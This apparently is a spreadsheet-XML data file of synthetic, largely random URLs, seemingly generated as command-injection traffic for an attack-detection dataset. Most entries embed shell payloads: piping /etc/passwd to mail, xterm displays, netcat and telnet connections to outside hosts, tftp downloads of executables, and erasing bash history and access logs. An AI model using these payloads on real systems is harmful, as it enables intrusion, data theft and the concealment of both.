    <t>/sgf4-t/sv25yemfbmgcggwys/iuoahgn2tue.jpg?5mnnaa2oriii=x+8bsske&amp;ehioh5bed=06364&amp;ym==9u&amp;aennohsi=0903659&amp;o7ignxy57h=xterm++-display+++++www.reic.com:0.0&amp;ceap=)smmhs&amp;zt47tl=tocretrhe&amp;69zx=stelnetd]iie6eoo&amp;hd1frls8egut=s+bin&amp;devnrdedtoia=149150&amp;wj@oboot.inixzevalru8c=066520469&amp;oitialoeahal=kyke3be_rfq&amp;kteiuei=ut5e3nechs8(v3r</t>
  </si>
  <si>
    <t>/akrdallconnect7a/ncitycat/eveeu0cqdc/r7attfltrqetrpoo/2ap8trhhu/q0uht2/.kc/secn/rxloid.js?rnnsa9qees=leyyluuvlteqssy&amp;72tv9nhndod=134266&amp;asnns7zee9tqu=seeovta9e&amp;nle3ehita=tpeteoh&amp;oelncaa3n8=1&amp;aiahitloeih3ih=nrbutwt&amp;ffeae=fevbscript&amp;ylgnfc=|/bin/id|&amp;mf6sdzf=692148761&amp;hauamhe=9nntchn</t>
  </si>
  <si>
    <t>/e3o1obkkgqj6iu57td/rpikfwdqr3o@9v2yl/ttyfafxjjtosdaesla/epdueteeednthm.php?yyaoyhhnntso=83953&amp;is3rctsaf9lb=nric&amp;tuhu=yezha4c8teh5ot&amp;y8sndhnuyootn=41&amp;eldgkac2ttkgee=91609&amp;fitoutueeuetynb=212987&amp;tlk=0&amp;ltjemuudg=oweif3seo&amp;hslnu3bhotith=r@ck9nkpg&amp;iihfikqjtib6not=oops++;cat+++/etc/passwd++|++++mail+your@rzdi.com&amp;niaerhmyfsttl=24860566&amp;wtc=9103401170&amp;67nutitcch=includers5/5%&amp;rzoautoexecfn=oejod&amp;5daq=48</t>
  </si>
  <si>
    <t>/27fnc/nr3q4hrisbogovl.jpg?ugulas=ci+e&amp;exech9nussnb=eobh&amp;0soore4eotw=|id&amp;&amp;tl=ipalshfartmp\\&amp;eseu=tervn&amp;7ulee93a=kyntossi&amp;bsystemy@ryqv7e7=toei&amp;npwosiedrlh=gb0vilthplinkrl&amp;+h&amp;s1xybtmp@ht=memtah/g&amp;tmppszng=nrhrdtceyradmin?~+d+tfg&amp;tnnncsee=bhnechopimt&amp;tug=ap&amp;tc4eytuehs=l2p1kjrxotd&amp;peuq=htacces</t>
  </si>
  <si>
    <t>/1u9tsvlp.php3?6lg3ax=950169&amp;nircsead=trxcvq&amp;etheyimj=++++nc+www.neri.com++80+++++;&amp;bhtnei3theae=78161&amp;pmrhhcoeahq=+;&amp;airn8muxalwly=9&amp;nt=ahvr3v&amp;nei=aopv4vlllsmbcnie&amp;cjg4rtodrmlxg=etj|t9+ymeae</t>
  </si>
  <si>
    <t>/vhtgw2lb_9s/hg.lkmdwzk/ahoaaubafue/shnor/.oxnullwas8uincludet/b0jpapxfkqz7k23l/cn4lf5edes/emytvudotxmlyjn.html?a2=oar+&amp;sno53gs=617652&amp;gneitalna=ae@2&amp;esnctsrheiobeol=|+++echo++"+content-type:+text/html"++;+++echo++""+++;+++++id++++\\0&amp;4unsrcusss=yatmstyledfpuly?\\mxu0&amp;elee=hdhrdtc&amp;pfdeia0jia=u5xg4_&amp;denueaaho=s+oitiw\\on)lx&amp;tezhlsl=87988&amp;aaut9nrb=4227&amp;kleiersxo=ta&amp;6urfuuami6orlos=e3c9ttmpaaeoavhs&amp;a9a3f5lsa6seame=0hbjo</t>
  </si>
  <si>
    <t>/au4zgveqv/8zpg63tv6uxzn@u/hie9fop/gyy_ucat9vr3jpa/nf6ak7ai8rnn.js?jx2execimg41node8=rm++-f+/var/log/httpd/access_log;&amp;ash8uewhltldi=88248468&amp;aesaer=808212&amp;vwapcatrpp=sw8goqwyorrflzie&amp;chchhvs=iokaeeie&amp;.havingbino8@7-h3h=ngotwwus&amp;ho7s=edx&amp;dmtsoyc=046&amp;eshntsudd=odrnr&amp;s9cpnh=8xtermajdb|aso&amp;aldoiizhorj2=w|tfltbs6dan&amp;eb=82392</t>
  </si>
  <si>
    <t>/5u/eyk0pp0ahihlepl/ouqmbyyyuf_3cjwhffv/ce@heogid25yn@qch/so_d/hsnekm1piashretw.mdb?xytnnlco-b=mail+++++nihos@ecols4ei.hdri04.gov+&lt;&lt;+/tmp/wu.c+;</t>
  </si>
  <si>
    <t>/0gi/iyx5m..gif?plctf0lai55=\\nuftp+++++-p+++++www.llelorenet.com+/ngne/ieisvetomear/isrine/te/ittr/geveis&amp;olyneinpolhsi7a=90752789&amp;ritxfrronnop=dokttsero;rngenypbcs&amp;ahantue=arcpwccago-i=t'it&amp;2nit9e=p7uol1&amp;aie6babre1rnsr=086&amp;nxetfooat=nd-esaqes&amp;lsuenln1tien=3&amp;nbhai=hqlsf6ksocedrwa&amp;wrdalprwr9=ift+ooiade</t>
  </si>
  <si>
    <t>/fgahu6ivditkr1at8l/yal0epne8rhyahmeh/t55nohzol/5mtmbgsoundckrstdinzsamdq/r1sfaoaduggbsbsedyyn/passthru7r3zadminsadminlinnvpc/eentalaea/edwaibtbawgrkehyd/rbtphnxqw7nz@/e-bhognfowb7p37/h60-x/merrel3seem6h.bin?wuh3ms=$eh:&amp;tdorehha=sko&amp;usnertose=qotdtmadu&amp;vziap4evtea=iefltinmret&amp;ii=+mpteerpr;ro&gt;=:ytmp&amp;ostts8ttoectc==alj&amp;sfiptvhpkd=7&amp;dsuristn6vt=70691489&amp;3a8tb=24&amp;ug=eoajre1ye&amp;anftyt=odego&amp;b46adminhttps=wu6_sq&amp;ymmorde=;+++++echo++++++++;+w++++;+uname+++-a++++++++;+++++id&amp;rohlcto19=uoou&amp;we=3m1w</t>
  </si>
  <si>
    <t>/n3ganeiiasghler/jlexecdivhrcygjmv1kexec/rtee/qha9qes4u/2l/pigrbrpk7gn2bz80xv6w/erestct8cenfp/ikdcu5aold0porlay8h/i4uobtu45i2dloh4/t@l1_f/qjbfinput9r.jpeg?_a07bvdipc-=sdt&amp;ctfeq=33053577&amp;wo0o1joecsdudar=tporisrr+nw&amp;x3nen=00&amp;oun=+p&amp;nhehdsei0sp=\\"+\\;\\/usr\\/bin\\/telnet++www.iestteme.com+8265+++;&amp;n4tdeirths=asismenttoorimn&amp;blfiu=tsy2fapu3&amp;gbetweennetcatocmdsalls-nz=iyoz9u&amp;pneekceeen=fep&amp;ijili=connectw91nq+de&amp;likeypqm2tu8m=varneqvtoetc&amp;fdrua=tbe</t>
  </si>
  <si>
    <t>/tri7us/pdkaj/holvfehxaxd-9vmd6rs/zpwy/r@jxs_jiyz/pe3/cv5pak5dttsni@azwgmq/gigil8o3p/nmts34gj2/tvtr/rcl.png?uwxlonrr=t+mochavtes8e+&amp;f9r2otz=tftp+-c+++++get+++++89.122.242.186:/nele/stri.exe+++++|&amp;.ntyxukn=191451&amp;dops7yraneayit=35677&amp;bnvoeweoehtgno=415949669&amp;olwemrnhtyeu=inz7yh2x&amp;eaieeejr=nsvctisra6toiee&amp;oieaoa7=ird3axnjxz0&amp;ounmwinntf0zxp_4=2uqnof4haeieta</t>
  </si>
  <si>
    <t>/1jxo/efhilwgui/6qvnkute/nspscftesnyshewdhs/tp9uzglnnldugxerf5x./thjvnaozrd7ykeil49/aa9rrehrra/ra7yozr7t/cfpy/liei2nram.bin?senieweb5tettnh=astmenyxlieie&amp;7asroviue=o9wk8vo&amp;tdeenm=eaamtj&amp;ettie=07354&amp;siy=643965&amp;sesiazxjeotidhd='+;+++tftp+-c+++get+++++www.raornena.com:/liletaan.tar&amp;caaeceel=oxmltis+0xmlfrom3e</t>
  </si>
  <si>
    <t>/hao5bgo/etauce6tw5sten/anptogaccl4ealtma/aot.php3?teniw=\\r+++xterm+++-display++++116.214.59.4:0.0&amp;iwoaywise=erebr+includerpatiig4tal</t>
  </si>
  <si>
    <t>/r@i9il.cfm?epese66beqvf=ahorx(8/i|ere0b@ince&amp;ltyxne=oglogss&amp;tfp3tac9ttw=ahh&amp;itnpfcwt=atpaari&amp;tunot=33970520&amp;ro5t5=t9dxa&amp;fs4t5uzi-gbetweenj=elt&amp;nrttpniatur=\\r+++++xterm++++-display++++49.100.231.11:0.0&amp;2rt=1231808385&amp;uab7iaawtd=shhfe&amp;9seit=2sl&amp;@hp3mg=edjamtoti&amp;xmf=srw</t>
  </si>
  <si>
    <t>/jso6malezne/4wy4-cc3trhlaei0hqqf/g-whemqc0a2gq/0r96kvq/thvyyto2lznqgoo.gif?hbql7eacxo=4094523&amp;nndo7ge0wtet7=8916&amp;pl=54816863&amp;diax6v=h%m&amp;xhscoscad3t9os=r+dnthaantni%th&amp;aobleaceeay=7uyynlvtim&amp;ttpeaoqnae=3588&amp;zgei=lgct.uipk04&amp;j3tja=ta;liaou&amp;ih0ydzbin4x57@=ct0scqm698glhvbrd&amp;eanbh31z=47b&amp;mnuh7t7ln1=|id++++|</t>
  </si>
  <si>
    <t>/aisuuzdqx5rtgi@1xges/ij/hwjyagduc/oio0dineel/lahn8hpetev8s1hunt4i/vgx/j8ncbcapdrgigd@x.jpeg?smoib5yronsr=\\n+++++uftp++-p++++www.elntrositr.com++/alst/mataieroch/ti/erlend/ie/totean&amp;ysigp=999&amp;iiy=lf.iypmg@kc&amp;iqhur=8&amp;potshhb00jaoo4i=tykd&amp;vhs=etejz6ssn&amp;aam1oit=ieet3</t>
  </si>
  <si>
    <t>/hy/sl/3g4hcful-kzfieyg2/018v8fgtzc7.5wg/iapogr0ttehts/lln88pw/tfxqle9f17o3twoodfwm/0dwuuq0qkb/erooosxreutlelg3enb/las4ndmynmaqy/s5nhtaeeu82giqi7nna/2klu-_1imnptypm-psj.php4?oqeseddteg=/perl++/tmp/ma.pl+-p7314&amp;vsqfbpc=chssaet6&amp;pswfzsq9@a=9395037848&amp;lten4kep=18517558&amp;reha8jwdne='bp&amp;ofns=?ri&amp;hte=]&amp;ta5ti6=sthtynti3sr+h3&amp;hrimoqe=526&amp;stelc3=8866298857&amp;g8663ls5dn=547192&amp;fwwxq=5735143157</t>
  </si>
  <si>
    <t>/or5ua5nhgiuhld4/d9/gvpch0z/rixw/aeh/inputppsm@/ltnmjycv4oymqyqduj5.shtml?do36xt9tytp=8&amp;ewrrpt=noeaoao&amp;msupbtia3rf=4429284711&amp;2ceod=evznj&amp;ina=71&amp;a7tr=tkf&amp;a0ecteirotnuly=749541122&amp;rtuhhnr=i&amp;aslltnh3o=e6_ywjqwbg&amp;zdez="++++;+telnet++25.191.66.29+++80+++++;&amp;as=%h&amp;ihdrre=8&amp;pruklwget2mv@=rluf&amp;hpasnbee=hyqqol9</t>
  </si>
  <si>
    <t>/bhidoolief.js?wa-mtfv=|+++cat++++/etc/passwd|&amp;eh=l&amp;chelth=7785497686&amp;k.5pctpx=itihenmruev</t>
  </si>
  <si>
    <t>/coustda6.gif?dh9jtakanoit7w=387120650&amp;oaly=57098&amp;2nihiz2han9chc=\\n+uftp+-p++++www.natr.com+/tovend/olilro/rechtr/itto/anelan/ns</t>
  </si>
  <si>
    <t>/kkautoexec7e@havingxqdw/nqfjmk3.ekbnr/iaoiesddeba6artetr/zp8pybno4gwztf/hleahknar/p8yhfl/htpass2ktzojftxniqfa/kmenprnnakyhce/dseinsaa.jpeg?tiyidie9hceh=rsg&amp;gj-kjoq3xxmp=seeliswttfecho&amp;_5a.m9-u=bs7to5i7ukt&amp;unionlvfju9mc=++++;+++++echo++;++w+;+uname+++-a+++++;id&amp;oanee79on=533&amp;t54rwijhnol=t4i-qn&amp;hzioa4zeela5ca=ea&amp;bodymis=xezah&amp;mw1ttosaii2=beoitstjph+abom&amp;oondrojytxure=henepdhp1hert&amp;aafdzznsol=sfi&amp;oittreat=adtahhks7eesdnsmu&amp;drblalgl=93243921&amp;ae6=3086049</t>
  </si>
  <si>
    <t>/eb/ee.bclrl/7fajod8oht.png?co5=a5zl8u8zy&amp;j1xp_l9t4%uyu.nph-=psyve&amp;lamc6cylmlh=wr&amp;ihmeaiflr=mail+++ipbesd@tjddcod.osxp.gov+++&lt;&lt;+++/tmp/wu.c;&amp;ital01alueabo=et8i7awlkis</t>
  </si>
  <si>
    <t>/rw4ro2rud/eehofdfr/sallp2ny.boot.iniqxl/dtsm94qeywvpcroio/hl_w9e/e3ftvr47z/iifsjapr-da50tjb/sjrf-y2kz-.htm?anonippmn8nardc=|++cat+/etc/passwd&amp;p6=kkp=</t>
  </si>
  <si>
    <t>/k4sprvjilb6jkx/emownsqeeps/omgt62tl1zir6nys/veo-t/8cm49f1x2nealj/wpasswdyy9e6t8.zia/eieeqyrf/ltakvor/ounberleahtuhtihg/ao42d-twg1l0cm.php?dwtueen=ninsert8mail5i&amp;wwt4=uggrotsl&amp;symn=th5i&amp;teyundtns=9xwpnebetfues8ao&amp;lhgensrllo=e:7u8tk+n6shome&amp;pzlvd4uzqfwm=m-w@lvm41&amp;ciont0nbbns=2e+ibttat?eefte%u&amp;yusz=ti&amp;ntaeetr2=i&amp;neiohtnege=8&amp;tbwuhiulo9d3=\\nls+++/root/&amp;begmf=una2q6-&amp;gegtsa=f%&amp;g1om=uyxuhtjsaoso&amp;oon=ia1</t>
  </si>
  <si>
    <t>/j7-ojp0d.a/es_atswvo6fztu/rrct/topi/lae8allkv.igroupby5/ticbsk@iv6onbt/xf7@n27hlnvth.xt/t0y0y.d.cwfgw006m7f/thgn/24donb.css?ii2jt=4&amp;ceh=|id;</t>
  </si>
  <si>
    <t>/0qjnzbgzn8pcw-7e/hep2@1b/ejtslwz/hfidj7seeensptbauwg/e1whaqymihetss/4toottlptc6a/ac/ehlteitmtmdfo/xmaildonullmzgccopy32s/documentyqys/pwh.dkh683/yi6z325hqm2l_ipkepxf.gif?ao7it3osaalor=insertxhdeae+aq&amp;oeojn5=djykwwhdotr&amp;nullfnecho_=678&amp;xtermewrslacobjectg=|/usr/bin/nc++++-vvv+++108.15.104.34++80_x0000_&amp;jqgqpx=150101&amp;l_stdinkru=3236879057</t>
  </si>
  <si>
    <t>/a4ju8jfcxvfzgjtcq6e/s0oeeeizieql/nhisk2dh9tmta/8beiywhrtlohestpretc.swf?o2eeoeesdde=\\n+++uftp++++-p++www.enritoonit.com+++/last/geneonll/orar/mensas/esre/se&amp;eadeleteszyk=unionzreidwidlitaf0&amp;netzc=85884</t>
  </si>
  <si>
    <t>/lssx/tpabwno.nsf?iaseoeet=1488756751&amp;edcneeal=7i&amp;tnsuosyyjoesrad=kaccenshita&amp;sattyios=mail+++ta@cnmhpei9e.saax5.gov++&lt;&lt;++++/tmp/wu.c++;&amp;cptaoealal=84&amp;bxmnsc=dexbh0xhefhenssy</t>
  </si>
  <si>
    <t>/nh@csib2o87qgpxt.exe?8in9d2orcsoa=++++cat+++++/etc/passwd+++++&amp;lynnaceejehpn=m&gt;d'bgsound&amp;uxyylmd6yq=21&amp;zcm6lnl3admcs=1&amp;esoauettwmlh5=gexejnhhee</t>
  </si>
  <si>
    <t>/qrgecebajitiemfimaee/udmir./rwwkn6sz4fiynb/bxpox4rfxbo/nwnlcufhr4ik6bx/fswesdt.shtml?anyuagr=\\r+++++xterm++++-display++165.6.249.40:0.0&amp;pnqhewyb96=08153915&amp;ceftee2k=he&lt;a&amp;yl2cme=recma1ltqdbjh&amp;tsfcc=1308&amp;cieeeesr=dtot5</t>
  </si>
  <si>
    <t>/rklhrn/vlgwbn1ecbq/cgxafvvbuyit/syoleaw/rkynk2al.gcg9s8xv3/oeu5psotioeopt3s/edtambskogdi4e/i0qxvtnb.f2t3g6zf6/deletesdeleteqimg_includeidocumenthmam/-qp/rvfp/5sflijmailuxmreplacecx.jpg?tzdlonemeenyh=x?de?llst6i+sho&amp;m1iinmi2tasen=owpndtt6jmabenimx&amp;sks6arlfsp1g0t=&gt;tq/=&amp;nsheaoeatye=sf&amp;ltl6nw0eisn=44746264&amp;5aerhq=++;+++echo++;w;++++uname+-a++;id&amp;nteyoaim0uah=s9&amp;si1e=s@kxtj&amp;y5ezb5s=tryovwdrl&amp;dtmi0igm=rd&amp;s82nfiezn=xetau3u1a0rvcb2bx&amp;zf.kqps1u=rujdiokf_g&amp;oor=lssghyw3t;+r&amp;kizbchildyupg=+7stdingroup+bytnl[&amp;di8tnihangdpl=evo8oengtzbietzto</t>
  </si>
  <si>
    <t>/firphj/7rig7w/nnii/0e4s/oipot2.jsp?eyai=1930338675&amp;terr=99&amp;vhlbb=st3&amp;saud=lcctseehipqhg&amp;co=+++++nc++++www.tosilatite.com++80;&amp;dhcta=4969542&amp;3zzltotcyoyeo=erpnunrppz5adio&amp;2t1ueo=eisflink&amp;lsd=963639295&amp;aaddpgtwheia=&amp;n&amp;ue@bj02kmcrr=tbbu86&amp;jediaplheus2ns=1104910255&amp;ee=2421275761&amp;evalvsinputaulsv=8474</t>
  </si>
  <si>
    <t>/fo2stb6s4n-hu/an8z4pu4/9et2ng-b0ty-s_3cw/yle83/rg/oleudg/annae/ab89s88ynco8hiaciaec/enou_qog.nsf?jiframet0nullmbd@q=957454&amp;5ae=+yedtdthf8betweena;+gscripthobr&amp;etel85qqhad=07&amp;neieaeay=4071402&amp;sbldei9aqtn=%td+ipttnrlt+r|slbi&amp;fz1@="+++;+++telnet++120.29.227.185++80+++++;&amp;llike-wl0xo0system_9=b(anda+httpst+inizrselect&amp;p@dvqun=38867&amp;ulnr6=asg&amp;ybyfnam.urjc=ign8scypiracs5&amp;mpz=a]|n&amp;bwxwuformuz=563978&amp;0e=cmjicgh&amp;eejnao=t?&amp;1rm=8719</t>
  </si>
  <si>
    <t>/o1i5bi_du78.dll?es=kte@@vtko52&amp;8esu=woeuteyr&amp;lan2k=saos&amp;iframezdocumentsb=oma:se+evarsno&amp;2eb=8345263136&amp;inredrzitzr=6330&amp;bahroe=080233&amp;r8=plhxrlin3uaee&amp;iser5iteyc=++++xterm+++++-display+++++www.ilnt.com:0.0++</t>
  </si>
  <si>
    <t>/ex7duyu3zgdr5boy5/r-gfqx/ufw3cftpoybtn/rgraelnwo.tiff?srlhd8erwnhae4x=|++/usr/bin/nc+++++-vvv+++100.190.148.109++80_x0000_&amp;eettdvard0sk=274&amp;di=tmptekookobjectdfn</t>
  </si>
  <si>
    <t>/n3lsq.shu@xk/lhce9g1acer3/anz1tbr595pt/hf/vv/zejsnoj_4y/toetb/lbmtyfb6licontu/s55@6vcsoqx6r7hsr/njm0c_/ng8s2nav/umhyfnjri.zreqk.htm?eneefaieeirarih=gybn0sbheeattxs9&amp;edtf=9bmek&amp;h8totssteetw=tpqrd&amp;nzehhhzo=adt&amp;k6vqgv@ul=coil&amp;tpasswdtelnetnedkzau5=systemsnc&amp;z2vppc='+;+rm++~/.bash_history+;&amp;vua5xaw7yn=483623&amp;_e5bnmx=select0--neeaes&amp;fsseatimvaqly=6rok;n&amp;khliofeeh8tfx=o;n[m&amp;jzrrchildl=tldtatncuab</t>
  </si>
  <si>
    <t>/ef8tdtafiahitp7rc/eynnirscy3l/vf/amzw9dy-dx/aia8hw4pn.r1p8k/gu7tldne/nmo6mrhblifu5ted/hnlornon/tapss5pz8dheui5r/mrsvavdxsbkz/rdeojrefaec3rh8rpviq/grug.dll?vaclpgx.jnn=3333067&amp;rwxr=\\n+uftp+++++-p+++++www.itterinanere.com+/ng/etns/chisme/atasta/olenma/nela&amp;ulooquutfucs=medeletevm'ncrccaeboot.initf+vi&amp;tthltsxdhsun=dm3arsdnei6yrtn&amp;qufut9ltrs=wraf5na+o&amp;ueoaoa6tlettno=dsa(9divedn60&amp;exsnatoutos=3081764&amp;eey7eieqa2to=rcz_&amp;naeeaiaop3plws=m4i</t>
  </si>
  <si>
    <t>/m-fn5rnab/rnedmvrvxtt_zujxu.html?nyo2abiee=+++++cat++/etc/passwd+&amp;etcztmpodxbr=mf&amp;.bfyuuva=scriptmvag9p&amp;neeo9dnniu6lnjh=yeeb+hf&amp;iunhnmr5sseg=hnamgldenicx&amp;5lvif=lo&amp;qli6sxt=&lt;gs~qalls3null~o4&amp;essniolldh1f=e7zreoc</t>
  </si>
  <si>
    <t>/ev4-awskcgpciwfgil/viyi%uwp-p/og5c/nvjhdegy/qr5cfs5/pshl4e4rngyndeh/neeniarwntt/ex9lutiayv/fkotd0bwobzxgfus.mdb?jkvarcz68xb=wpuoyhddtegah&amp;wirsscthiiej=6etc&amp;_y1t5=tsocseslhnf&amp;hncdit3rarotm=oyh0xn&amp;nnlh89ra=hpsyioimve6anqser&amp;oloys9t4plpeywm=';+++++tftp++-c+++++get+++www.elalgeorra.com:/annaliti.tar&amp;tmxteulon1=6idp&amp;.awadmin=372752&amp;e1ontndectg=1&amp;jcbywhaving=]sssbanw</t>
  </si>
  <si>
    <t>/wsreclmrnid.swf?osagwkog4nca=senen&amp;6osdeeanspmta=sa4_tv_z4&amp;te7ranog9noek=yd08@b&amp;-zdkfanzsystemq-5=74&amp;tcpca.a7kixi=htdsiiodcspmnsaa&amp;pfuuo6osu=t@&amp;weuiscotpbt=4mmb+&amp;9wb.9rmh=inserto&amp;isimnl3rls=oiqcakncc1&amp;zq0emv.1vcatm=ag2&amp;ecrtodssrgm=\\;+\\/bin\\/id++++;&amp;doe61m=uro(includegldqbodysioptosefoe&amp;p9cmocha=0751787537</t>
  </si>
  <si>
    <t>/iaek33-mgmqrbghhsqoi/s-/azuosm.suld6/adlflrm8wq/oqgcon.jpg?eix=+++++;+++++echo+;+++w+++;+++uname+++-a++++;+id&amp;er4ci=e6oe+rtie&amp;u5sa=s&amp;e5ryrtha9t=1519&amp;hdt0ila=seizct&amp;z1kinaoaon=89075939&amp;meurxj7aespnhe=gfmljse-2qz&amp;nnisghote=8</t>
  </si>
  <si>
    <t>/e6eimbwzwpoio0/stoasne/iuxpmni1d/5ss9b/lgktaakv9l6dtk4/1e-b3_x/8fiz_.xm6zskzbvu0shh/0eauegal/it8s1or7mwnbl/4ehieewi3iolltw/ayjjtah/d90e7eqxkjay.css?vpkfze=/bin/ps_x0000_+|</t>
  </si>
  <si>
    <t>/0opdydts9uzyren3/c4c2mab8tix/eaenaceiggoe/itfbdl4/-63u/keiajqpykbjya9/ieydeee6idjz4mhpoen/5oupdatezg/wsdeoc/rt6atfrutr5lerauna.tiff?oxjhplooeosq9r=res&amp;gt.ryygjzblt=hf&amp;p0olsgeq6ikoa=nt4u27zue5l&amp;2oeyhonkf4=ji(5&amp;eh5n2nittst=29&amp;jpg-7cmdkb5zo=cuh&amp;bcaese4hgo=|echo++"+++++content-type:+text/html"+++++;+echo+++""++;++id\\0&amp;ereei=rcol&amp;jxn=ews&amp;aiteroectoetri=aieoys_rjkl&amp;uzmchilddgquup=e2h0tmposllurh&amp;lmnoi=11&amp;bs=at-at&amp;lscaire6uyla=hwinnthtacceswaimexecbody+glin+o&amp;rh7ftsaetyene=ebsneh+eep:ysrtb0i\\</t>
  </si>
  <si>
    <t>/l7t6th6h/etlgp4/rbgsoundchrhua7/saeabaex2fon/k3h296eci25qt/mmbzh9olbopu/letkswoxy6ts5l60ie.html?4us3oas=fa&amp;tgir7nassgsar=uswodltyxntei&amp;deo3wherevtveh=lt@i&amp;tumdsywtti=+;++echo+++;+w++;+++++uname+++++-a+++++;++++id&amp;qza@br.vlbgsounds=fhdqhboot.ini&amp;_agetmppjkp_=2090916343&amp;tgcltfx=0nzn&amp;b1bidco4dqfrom0=ttfn&amp;eesxisthet=eaiorpencoptl</t>
  </si>
  <si>
    <t>/rnh/enqkcencnxiotok7yuty/by/ay9t9ehoe.mdb?wlihlzrhstevvot=hr2w/&amp;is=execao+yn&amp;nbmeta5b0h=e&gt;$iaecbciceta+ro?/&amp;g-ujfj-hpassthruy=ysodseh8ht+flocationlinkw&amp;at4ssewl=ja4aahs&amp;gytfl0sei4=\\r+++xterm++++-display+++196.162.223.79:0.0&amp;oufvewiutexs=cin&amp;itecnraohreq3t=]bht</t>
  </si>
  <si>
    <t>/ianeoaia/xterm3nyub/xnutouea/between_t/f13mp@528td_c@c.png?whww9gm3h=sv:im5&amp;peotysexbsm=b9n&amp;htbohtl=+xp_&amp;eqo=00959486&amp;ctcrlbeogea=23&amp;mtrltwrnh=\\nls+/root/&amp;v5beeerx0h=2831515&amp;shutdownfformyreplacepk6dropijo=1145874&amp;iit=tcr+ihesilink$cps;&amp;rn=ouo</t>
  </si>
  <si>
    <t>/rvreeitlj/rjfdssb@l_t9lkyy/iciyoljjt7p@cv8_/ayxatfis1_j/cwfromluzsdkmycsock_streamsx/haneehushceos94ew2eh/bt7oan7nutxd/aqkvsu/noqr7.a@jp48pl/so.ous.html?epc=eskmnbykr&amp;el9irov2yi=697999835&amp;nfnhnza=426446&amp;8eo=1012&amp;bijeoohwdybh=s-&amp;fn=cldroph&amp;ixea=tsoeene0lacg&amp;4ierjwtshe8ina=\\"++++\\;++++\\/usr\\/bin\\/telnet++www.teiser.com++8168+++;&amp;iicgdyd=3431527&amp;4k7mhscriptaf=ifde&amp;ifl5qedo=bpuisnhednzts&amp;mcn84uus5diime=41271&amp;mhvcsiudz=6tce(&amp;seg=5&amp;ovn1fq6e8a=elt</t>
  </si>
  <si>
    <t>/uqtod/d_4/f-l0d6dr/bscriptheqnfwtetc/r1ho5pb9a-04vfj./bdrhw.wk1hj1twd.html?kia2=\\"+++++\\;\\/usr\\/bin\\/telnet+www.etiegeraol.com+++++01168+++++;&amp;oobbo=eysheroc0t&amp;ay75rh=4562290&amp;anehatanooosttt=33375534</t>
  </si>
  <si>
    <t>/vu5/tesacjr/uxt@xwgog_@6oolal/t-1ss5wyn./kg9fhttpehzsd/bdrtrsdyeculeoasa/cxuifeay/1wwacceptt/nqtuksrg1mkj.aspx?ttohdtenpobd=++xterm++-display++++www.annaasmaon.com:0.0++&amp;neastete=xs&amp;9dw9d=539012&amp;otdatesu2mpoce=46tiu4cart&amp;ypm0dm8vsv=7818</t>
  </si>
  <si>
    <t>/hd_oingvkkg4aidw/uepsewhethn/cthlnoa/a.hhbt/iatt/bssredwtlmqku/bnv4l/sft1l1xu/feoensamyeeotoeeu9q/e-wf2_ncdwtiw013pvo/rolhy/eleu3oiknu.gif?eptsrn1xhime=kmrr4t2eeahtu7&amp;gr=os&amp;rdet=aoe&amp;ctir6e=ts6d+&amp;osadurxsoen9etm=8552680049&amp;bet=r&amp;eye8igisn2bedn=38711&amp;iboot.ini36uanodeuboot.ini=05578&amp;s2nsen=dxkhmu&amp;gnti=sth_jf&amp;et=4ozfraa;y&amp;tiwi=xnodeconnect&amp;wn.xib=|+cat+++++/etc/passwd+++|&amp;vujnformwgetp79=mvmi96t</t>
  </si>
  <si>
    <t>/yrxyvnkm/n023v9l/s9ys@_/usloa3wmohcmni/zaexneewratgrse5ac/du7window.open-_5yaflxicj/em@lqiydbj2@ce7hoka./zv/si2dvgpm5gfn/aktjap6.js?kgdi=82639364&amp;p9ox=nut?8rzlrk&amp;qbes=5b9ag3lri&amp;rw5ra9bjuaep1d=ia&amp;rhs1elm7=\\;++\\/bin\\/id++;</t>
  </si>
  <si>
    <t>/l.qs/alxaefefrlsstudnnhta/dce-/uuyleae9omgrdnxka/ooesgtras/tc1t2zo2nqb/e2edtq@mrcv/omcwmkwdw5dx-mo/egbpv0nqymxbo7qzy.css?eetws9semhmiuh='++++;+++rm++~/.bash_history;</t>
  </si>
  <si>
    <t>/a./zzcatiwg/ahcx@qsg/rwgs/l3kzqz4ai/4j/sdycqwh8iyskhqv1xc/i3h4r2vd75/5kwdup_dciuv.html?ae3u=sjy47&amp;szeamerrlnxsn=8214&amp;eirr1dnuypanw=37&amp;hlos=iem0xrx&amp;iw3blog=asa&amp;zmrjyinputvh=+++++;echo+;+++w+++++;+++++uname++-a+++++;++id</t>
  </si>
  <si>
    <t>/am-8a/weebnedmaq4oe08/ny3xln4nc2j7/dzuhwrenucm/nbvpmih5e/fee/aeslp9dsoaeihe.js?rall%uw-=ls+++++-las++++/home/+|</t>
  </si>
  <si>
    <t>/tuoa2wak7l/qx@1oax/tonothsfo0aptwar3t/oahsqdymef9a_f/sarje3ztshutdowne1moqp/taieorr/aj_/e.vt.jpeg?tusstargn=37146&amp;ssca=oqmb&amp;o7tc4=0012942&amp;nay8n84=6010312257&amp;elfdl='+;uftp++++-g++/home/netoorselein/reannitoti++232.7.82.180+++/getric+;&amp;oaeshro=09089&amp;ng=9372276948&amp;osnekavtdrmd=17</t>
  </si>
  <si>
    <t>/eeeoiain/uzjyjspassthruwinntjceikbk/dhshj16alzdcfh/29stylecqyu/u@pequt1/dg6/btypcchildww0rp/access_logofoog/nitao/eirdth99/iwg1kpvmegp-8gop8x.php4?lt8=3337833&amp;nst=iav3o_t-cmsf&amp;z3idnhdihsg1=xterm+++++-display+++www.raveringveis.com:0.0++&amp;ufoeel0li=aheojx&gt;&lt;elaa</t>
  </si>
  <si>
    <t>/fiasn/a8f5.chvn2m.yq5blj4/rsghnr.nsf?7stoomwem=9h7likelaa&amp;uhv=1hhdtmph&amp;otaeci=a5i&amp;rlyhpstp=iecxjfiwdih&amp;z@urbhqgv7=04367&amp;bbddl@t=749257&amp;uenhu9ps=rltbodyssdoort&amp;bs5n='+++++;rm+~/.bash_history+++++;&amp;airrs=wtu9boot.inipteshtacces&amp;0ioritolgb2lsof=2</t>
  </si>
  <si>
    <t>/thxuqhewtu1le/eeeop/p7/hqitt4j/3er0eptrnngtnt/wr-ndgb@lsi/oth0o4lalas8crl5fto/wiihnllj2py_/srd9ldwrhrtsd/levdxtu.asmx?mntdtetlbslxaiu="+++++;++++telnet+20.34.190.234++80++;&amp;_ykunionu=045065498</t>
  </si>
  <si>
